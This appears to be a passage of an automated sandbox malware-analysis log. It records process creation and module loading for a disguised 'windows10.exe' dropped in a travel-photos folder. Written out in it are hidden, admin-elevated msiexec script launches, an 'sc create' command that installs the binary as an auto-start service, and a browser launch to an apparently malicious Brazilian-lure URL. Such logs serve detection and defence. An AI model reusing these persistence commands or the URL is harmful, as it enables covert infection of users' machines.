            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DEF.tmp "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"Jump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartupJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-tokenJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.phpJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= autoJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start MeuServicoJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartupJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-tokenJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSI5DEF.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
